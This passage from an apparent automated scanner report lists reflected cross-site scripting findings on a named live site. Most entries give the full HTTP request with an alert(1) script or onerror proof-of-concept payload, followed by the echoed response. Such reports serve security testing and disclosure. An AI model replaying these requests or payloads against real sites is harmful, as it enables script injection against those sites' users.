The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 72606<script>alert(1)</script>e754d75196a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/googlepr.php?72606<script>alert(1)</script>e754d75196a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/googlepr.php?72606<script>alert(1)</script>e754d75196a=1 was not found on this server.</p>
...[SNIP]...

2.30. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df005<script>alert(1)</script>84058bc8097266e56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adultdf005<script>alert(1)</script>84058bc8097266e56/media-chat/more2.html?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultdf005<script>alert(1)</script>84058bc8097266e56/media-chat/more2.html?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.31. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d229a<script>alert(1)</script>0663d31a67b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultd229a<script>alert(1)</script>0663d31a67b/media-chat/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultd229a<script>alert(1)</script>0663d31a67b/media-chat/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f was not found on this server.</p>
...[SNIP]...

2.32. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab175<script>alert(1)</script>068e1ee4551 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chatab175<script>alert(1)</script>068e1ee4551/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chatab175<script>alert(1)</script>068e1ee4551/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f was not found on this server.</p>
...[SNIP]...

2.33. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f39f3<script>alert(1)</script>6c7404e2fc2cbc9e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chatf39f3<script>alert(1)</script>6c7404e2fc2cbc9e3/more2.html?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chatf39f3<script>alert(1)</script>6c7404e2fc2cbc9e3/more2.html?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.34. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/more2.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ccee7<script>alert(1)</script>4892fe500c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/ccee7<script>alert(1)</script>4892fe500c3?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/ccee7<script>alert(1)</script>4892fe500c3?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f was not found on this server.</p>
...[SNIP]...

2.35. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/more2.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6a456<script>alert(1)</script>f799552621c47f5b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chat/6a456<script>alert(1)</script>f799552621c47f5b8?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/6a456<script>alert(1)</script>f799552621c47f5b8?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.36. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ab9"><script>alert(1)</script>becd9fa467488836d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult13ab9"><script>alert(1)</script>becd9fa467488836d/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:38:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult13ab9"><script>alert(1)</script>becd9fa467488836d/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.37. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3fc47<script>alert(1)</script>5479294c802 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult3fc47<script>alert(1)</script>5479294c802/media-chat/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult3fc47<script>alert(1)</script>5479294c802/media-chat/search.php was not found on this server.</p>
...[SNIP]...

2.38. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd552"><script>alert(1)</script>e48346a7d0bb14fd5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chatdd552"><script>alert(1)</script>e48346a7d0bb14fd5/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:39:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chatdd552"><script>alert(1)</script>e48346a7d0bb14fd5/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.39. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8c25<script>alert(1)</script>2c6bd8ee8f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chatf8c25<script>alert(1)</script>2c6bd8ee8f6/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chatf8c25<script>alert(1)</script>2c6bd8ee8f6/search.php was not found on this server.</p>
...[SNIP]...

2.40. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a00f3<script>alert(1)</script>5084d4f9734 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/search.phpa00f3<script>alert(1)</script>5084d4f9734 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/search.phpa00f3<script>alert(1)</script>5084d4f9734 was not found on this server.</p>
...[SNIP]...

2.41. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89360"><script>alert(1)</script>eafc0b7c8065a3015 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chat/search.php89360"><script>alert(1)</script>eafc0b7c8065a3015?cat=17&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:40:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php89360"><script>alert(1)</script>eafc0b7c8065a3015?cat=17&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.42. http://www.resellerbase.com/adult/media-chat/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d01f8<a>d1f5ce6bb31 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/search.php?keyword=search...&Submit3=Searchd01f8<a>d1f5ce6bb31&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/search.php?keyword=search...&Submit3=Searchd01f8<a>d1f5ce6bb31&opt=2 was not found on this server.</p>
...[SNIP]...

2.43. http://www.resellerbase.com/adult/media-chat/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of the Submit3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ec57"><a>5282617bf64 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search3ec57"><a>5282617bf64&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:33:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search3ec57"><a>5282617bf64&opt=1/more2.html" style="color: ">
...[SNIP]...

2.44. http://www.resellerbase.com/adult/media-chat/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa991"><img%20src%3da%20onerror%3dalert(1)>1b774318193 was submitted in the cat parameter. This input was echoed as fa991\"><img src=a onerror=alert(1)>1b774318193 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /adult/media-chat/search.php?cat=17fa991"><img%20src%3da%20onerror%3dalert(1)>1b774318193&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:32:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=17fa991\"><img src=a onerror=alert(1)>1b774318193">
...[SNIP]...

2.45. http://www.resellerbase.com/adult/media-chat/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b26b"><img%20src%3da%20onerror%3dalert(1)>c55f296bc7f9e8898 was submitted in the cat parameter. This input was echoed as 1b26b\"><img src=a onerror=alert(1)>c55f296bc7f9e8898 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chat/search.php?cat=171b26b"><img%20src%3da%20onerror%3dalert(1)>c55f296bc7f9e8898&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:32:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=171b26b\"><img src=a onerror=alert(1)>c55f296bc7f9e8898">
...[SNIP]...

2.46. http://www.resellerbase.com/adult/media-chat/search.php [keyword parameter] previous next

Summary

